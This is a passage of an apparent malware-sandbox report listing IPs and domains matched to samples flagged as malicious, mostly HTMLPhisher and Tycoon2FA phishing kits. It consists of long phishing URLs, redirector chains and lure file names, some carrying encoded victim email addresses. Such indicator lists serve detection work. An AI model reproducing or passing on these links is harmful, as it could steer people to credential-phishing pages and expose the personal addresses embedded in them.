	http://9yhbs.contnova.srv.br/#X7	Get hash	malicious	Unknown	Browse
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse
13.107.246.60	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse
	L Catterton Financial Report.html	Get hash	malicious	HTMLPhisher	Browse
	https://emea.dcv.ms/5IgHbcWiml	Get hash	malicious	HTMLPhisher	Browse
	https://lnkd.in/egd84c_Y	Get hash	malicious	Unknown	Browse
104.17.3.184	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse
	https://quickinaction.click/relwaVXV/bWx1Y2lhQG1vb2cuY29t	Get hash	malicious	Unknown	Browse
	https://xcitin.com.ru/qXGZo/	Get hash	malicious	HTMLPhisher	Browse
	Staff_Jnixon.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	Staff_Jnixon.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://shoutout.wix.com/so/8dP2NQVHe/c?w=U1fBcW2O5dQTdsvx_upoqEYpm3E6io4L0nMWoaLOZlM.eyJ1IjoiaHR0cHM6Ly9waXlhd2F0Y2xpbmljLmNvbS9nYWhic2hiZ2ZiaG4vc2pkaGZ5am1pZGJoIiwiciI6ImRkN2FjYTYwLTE4MmUtNGRmNC1iOTA2LTFiODg1NDkyOTc4MyIsIm0iOiJtYWlsIiwiYyI6ImVkNDlmZGQwLTZiNzEtNDUyOC04MDRkLWUzNzQ3YzgyNmI2ZCJ9	Get hash	malicious	HTMLPhisher	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vRZI95_C7cPNd7yqESXpo7V1IELhryP_yu0eERCliDrH9gY4B3-toxe6dh74WiaeWa4ylVEaOlKx2kv/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acatenconstrucoes.com%2Ffrest#Y2FybG9zLmNhYmFkYUBkYWlpY2hpLXNhbmt5by5lcw==	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FRA-efz.ms-acdc.office.com	https://shoutout.wix.com/so/8dP2NQVHe/c?w=U1fBcW2O5dQTdsvx_upoqEYpm3E6io4L0nMWoaLOZlM.eyJ1IjoiaHR0cHM6Ly9waXlhd2F0Y2xpbmljLmNvbS9nYWhic2hiZ2ZiaG4vc2pkaGZ5am1pZGJoIiwiciI6ImRkN2FjYTYwLTE4MmUtNGRmNC1iOTA2LTFiODg1NDkyOTc4MyIsIm0iOiJtYWlsIiwiYyI6ImVkNDlmZGQwLTZiNzEtNDUyOC04MDRkLWUzNzQ3YzgyNmI2ZCJ9	Get hash	malicious	HTMLPhisher	Browse	52.98.179.146
	https://commdado-my.sharepoint.com/:o:/g/personal/dondi_giuseppe_commercialdado_it/EgcvgPn4-NdFixyQ4aFkj6EBbxxwR-oS0CTDFPyJEs3MKA?e=I59h3v&xsdata=MDV8MDJ8dmFsZW50aW5hLml6em9AZW5lcnBhYy5jb218YThmM2EzYTk3YWIzNDA3Y2Y4Y2QwOGRjOWMwZDBjOTJ8MTYwMmFlODIwMjY2NDBkNjkxMGIxMTY4MGZlMGY2YTV8MHwwfDYzODU1NjgyODM1NDc2NjQxNHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18NDAwMDB8fHw%3d&sdata=OUJxUjdKTmk0R2R2RzNscEJIZjJuWHhXdTJ0YnNCQmoyUmRlOWtxVlZvWT0%3d	Get hash	malicious	Unknown	Browse	52.98.253.2
	https://cl.gy/Drxwe	Get hash	malicious	HTMLPhisher	Browse	52.98.178.210
	https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==	Get hash	malicious	HTMLPhisher	Browse	52.98.253.98
	https://linestar-my.sharepoint.com/:f:/g/personal/crystal_linestar_ca/EgH5VvMfUqxCqthSlNI4dqsBrhZRILeELmLLYOjYesvYkg?e=AAEzrH&xsdata=MDV8MDJ8amFzb25zQHJvd21hcmsuY29tfGYyMzYyMTUzODQzNTRmMDQ4YTZlMDhkYzlhOThmYzRifGU3ODFmNDMxYjI1YTRhZDQ4MDYzYzQ2MGZhMGYwNTkyfDB8MHw2Mzg1NTUyMjkxNDY4MDA5NDN8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=eHJQM1U2eTh2K29qQjIyQmFFMWRLUFN5Tm5kdHdhRTRKVDA0Nmo1dnYrST0%3d	Get hash	malicious	HTMLPhisher	Browse	40.99.155.226
	https://m.exactag.com/ai.aspx?tc=d9648951bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ajeffreyhensley.com%2Fwinner%2F13566%2F%2FZWdpZGlqdXMuem9rYWl0aXNAMnNmZy5jb20=	Get hash	malicious	HTMLPhisher	Browse	40.99.157.18
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Fassets-usa%2Emkt%2Edynamics%2Ecom%2F5513f990-d232-ef11-8e4b-000d3a98a01a%2Fdigitalassets%2Fstandaloneforms%2F12aaa575-c233-ef11-8409-000d3a4effc3&urlhash=z-cH&trk=public_profile-settings_topcard-website	Get hash	malicious	HTMLPhisher	Browse	52.98.179.146
	https://www.onedrive-strabag.com/	Get hash	malicious	Unknown	Browse	52.98.179.242
	https://www.ocenit.cl/ocenit.html	Get hash	malicious	Unknown	Browse	52.97.189.66
	scan@jhfoster.com_Katie.bjerke.pdf	Get hash	malicious	HTMLPhisher	Browse	52.98.252.226
challenges.cloudflare.com	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://quickinaction.click/relwaVXV/bWx1Y2lhQG1vb2cuY29t	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://xcitin.com.ru/qXGZo/	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://public-usa.mkt.dynamics.com/api/orgs/d7bf9933-0b3a-ef11-8e4b-000d3a106c0b/r/TDEgwpm1AUWqGuhxxSAcVwAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Flink.mail.beehiiv.com%252Fls%252Fclick%253Fupn%253Du001.zV-2FAVEm-2FntcfbYMbzjaqbKZhAB-2FHhugJeFwz-2B4eDrq0xOMBQTM6qlBDRp75xHtySEdSKBszynN0RsLNImFmRmJGSCpsyuJM9bG8EB51sE4kW8XhzvRA-2BPtYYa-2B8QdjWMLCGEPxD3KrjRK89cl78vwPZBLWr2w7GMKSrXIn6S5ME-3DNlCi_04d4ywoI7MJdsiYCN-2BN3DcUV-2B5xfwat-2BOgMDujJ1c-2F1Yv6NlNivSyla3VBW2cjbr1yCOzHfMtbC8Z-2F4vXjnE7ALgpquLSNdhC7u38lmdLt2T6ipD6w6zyxyCHgz0XVbQES5WlZWU5UK-2F7jiXFjJMZnUhx-2BmdMZRiz6S2UNsBylqJ0eRKaX7ox8IC1QS9BJs-2FOp5ANI-2F3N9-2BkzY0zfUpu34-2FJzKpSaGCuqlPgMs88LTPgmgOGL4Q-2FnrnbiXZBJHFlVZxGFxtQ9ikryZpedOQgzoJOiPHqeU1B-2FuiPrZyb-2FCU8AyhbjwazN6wkHgNMqW2U421Q3Bse8i1IPiy6FmhXBqCiy71NcD1RwBQ1vXLrObsqZ08rjy-2Fvnv6paNjRw2yjigHa6OFZOGU-2BhN8d06w7h9ZANDTIwsYFfg1gNLn-2BA5B9bLK0s0uLZkFU4rvvWMQU%2523_msdynmkt_donottrack%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=d6IExTJM16fguE87xMA5SuNRU%2BKUfss25XRRndnMwLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Staff_Jnixon.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.2.184
	https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.3.184
	Staff_Jnixon.docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.3.184
sni1gl.wpc.omegacdn.net	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://qrco.de/bfDaL9	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://shoutout.wix.com/so/8dP2NQVHe/c?w=U1fBcW2O5dQTdsvx_upoqEYpm3E6io4L0nMWoaLOZlM.eyJ1IjoiaHR0cHM6Ly9waXlhd2F0Y2xpbmljLmNvbS9nYWhic2hiZ2ZiaG4vc2pkaGZ5am1pZGJoIiwiciI6ImRkN2FjYTYwLTE4MmUtNGRmNC1iOTA2LTFiODg1NDkyOTc4MyIsIm0iOiJtYWlsIiwiYyI6ImVkNDlmZGQwLTZiNzEtNDUyOC04MDRkLWUzNzQ3YzgyNmI2ZCJ9	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	CollectionDocs-04075.pdf	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Perfomance_Evalution.docx	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	http://adaptive-yielding-lantern.glitch.me#bWtoYWlyQGdhc21hbGF5c2lhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
linkprotect.cudasvc.com	https://lantzlagetnet-my.sharepoint.com/:b:/g/personal/christian_lantzlaget_net/EfvDbyrsR1JBhKxhyaS6aX8BVyu8MWIYIqkyeRAJSRL2yA?e=6Phvc1	Get hash	malicious	Unknown	Browse	3.70.101.114
	https://www.google.fr/amp/s/www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252Fnews4.thomasnet.com%25252Fwww%25252Fdelivery%25252Fck.php%25253Foaparams%2525253D2__bannerid%2525253D290840__zoneid%2525253D0__source%2525253D1740802%252525257C11236254%252525257C41282302%252525257C6812%252525257C41331406__cb%2525253Dc02ccb05f9__oadest%2525253Dhttps%252525253A%252525252F%252525252Flink.mail.beehiiv.com%252525252Fls%252525252Fclick%252525253Fupn%252525253Du001.FC1hxQg0vjMaKvj1drxxGuKT-2BG094DJrg2lg9-2FG-2BDn7QRAMLmBcxi2ye-2F-2F7EjbsbD9DxrNnwxFlLC7mBB4kmF9Nx5JHyuRngUXGjkpWEQMk4mRp9AFiVX7-2BZgaAF53RluGM8GCvkwmv5gqrtbtpF6mBCFN8Y8ck0o5BflBavB8KnfeGkHyaxX319ktcUVxlNdESJjXzDLf5cyamHA-2FAl3FGJEUNVdLj3d6ujL2-2BirPvOffPQu9FmPd5VwQPzHwZxJlTtdpVl8zMo7PAjQV9pr2NYeph8B-2B6kq7ZekkEo14FgtI93d9MoL7iDJlUFLG2v0GO0jtMba2TYCWyX067ildK9BsZpgx7VoGXvfn2aR2P02guuJmS1c5N-2BbzXRSlS4c696HSjsppgo-2BOOqCriMOIXyjax-2B2KzYoCwgmdn-2BDsaJxmCG4BMJzbVffDnvXmOnxU25pAq9xroVE9a-2B-2BIx8gj9NZG7wTTTit-2FcTg9Jd8YDZ6OZMbdlNIfc-2FRnXIjpMEn-2FjedF1-2BFG2ozJiRNKHIjXXPtDZELn2X-2BjgUu4MnIdo-3DnF4B_k5zaofJQ6PaDm4eQpA56e4xWG4OoVdk-2BXhZTssh6QwsCP88A0kMHGtSsxje-2F1AU30KTV7-2BlBTi6pp7PuMf4d7wqeQNN4Huw1SG4C0tuGL9gGqTiHWbC9BSRJjvmps05NaTwFMzBEVo0UJzya2meS-2FmVrnPkhcGc3biFSisVA2FWlcvIOk-2FijIsuLy2LdozK0ARg92NS7iou9bYRThT7sX-2FsV4yZCGeZVTBfuxTwGFJ9kuNvtlbJDKESs7aThJM2RUIAQikDXokYd0-2F6YOopU6iOGahHsqAPz-2F7OVsxEI2J-2Bil2Xp-2F-2BFswu2h7HFQlSpycpn1PSqpJxUXIra88-2FAf1BNT-2By7AQkINCI-2B8pSghycOQnELmGlM3zaTl3fTTOzHUw-2BR3I05pXXeGuubVfJSTfHxI-2Fr4GH471S-2FlKj3WIL5odUrBQ392yQ-2F33A8EMv8tnFWhIbI081ft6Uyhwh4jorg-3D-3D%252526c%25253DE%25252C1%25252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw0dneiXzPs35uhkwcBAlGYI%26sa%3DD%26source%3Deditors%26ust%3D1718388339083604%26usg%3DAOvVaw0YeSd	Get hash	malicious	Unknown	Browse	3.70.101.114
	https://www.google.fr/amp/s/www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252Fnews4.thomasnet.com%25252Fwww%25252Fdelivery%25252Fck.php%25253Foaparams%2525253D2__bannerid%2525253D290840__zoneid%2525253D0__source%2525253D1740802%252525257C11236254%252525257C41282302%252525257C6812%252525257C41331406__cb%2525253Dc02ccb05f9__oadest%2525253Dhttps%252525253A%252525252F%252525252Flink.mail.beehiiv.com%252525252Fls%252525252Fclick%252525253Fupn%252525253Du001.FC1hxQg0vjMaKvj1drxxGuKT-2BG094DJrg2lg9-2FG-2BDn7QRAMLmBcxi2ye-2F-2F7EjbsbD9DxrNnwxFlLC7mBB4kmF9Nx5JHyuRngUXGjkpWEQMk4mRp9AFiVX7-2BZgaAF53RluGM8GCvkwmv5gqrtbtpF6mBCFN8Y8ck0o5BflBavB8KnfeGkHyaxX319ktcUVxlNdESJjXzDLf5cyamHA-2FAl3FGJEUNVdLj3d6ujL2-2BirPvOffPQu9FmPd5VwQPzHwZxJlTtdpVl8zMo7PAjQV9pr2NYeph8B-2B6kq7ZekkEo14FgtI93d9MoL7iDJlUFLG2v0GO0jtMba2TYCWyX067ildK9BsZpgx7VoGXvfn2aR2P02guuJmS1c5N-2BbzXRSlS4c696HSjsppgo-2BOOqCriMOIXyjax-2B2KzYoCwgmdn-2BDsaJxmCG4BMJzbVffDnvXmOnxU25pAq9xroVE9a-2B-2BIx8gj9NZG7wTTTit-2FcTg9Jd8YDZ6OZMbdlNIfc-2FRnXIjpMEn-2FjedF1-2BFG2ozJiRNKHIjXXPtDZELn2X-2BjgUu4MnIdo-3DnF4B_k5zaofJQ6PaDm4eQpA56e4xWG4OoVdk-2BXhZTssh6QwsCP88A0kMHGtSsxje-2F1AU30KTV7-2BlBTi6pp7PuMf4d7wqeQNN4Huw1SG4C0tuGL9gGqTiHWbC9BSRJjvmps05NaTwFMzBEVo0UJzya2meS-2FmVrnPkhcGc3biFSisVA2FWlcvIOk-2FijIsuLy2LdozK0ARg92NS7iou9bYRThT7sX-2FsV4yZCGeZVTBfuxTwGFJ9kuNvtlbJDKESs7aThJM2RUIAQikDXokYd0-2F6YOopU6iOGahHsqAPz-2F7OVsxEI2J-2Bil2Xp-2F-2BFswu2h7HFQlSpycpn1PSqpJxUXIra88-2FAf1BNT-2By7AQkINCI-2B8pSghycOQnELmGlM3zaTl3fTTOzHUw-2BR3I05pXXeGuubVfJSTfHxI-2Fr4GH471S-2FlKj3WIL5odUrBQ392yQ-2F33A8EMv8tnFWhIbI081ft6Uyhwh4jorg-3D-3D%252526c%25253DE%25252C1%25252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw0dneiXzPs35uhkwcBAlGYI%26sa%3DD%26source%3Deditors%26ust%3D1718388339083604%26usg%3DAOvVaw0YeSd	Get hash	malicious	Unknown	Browse	3.120.5.54
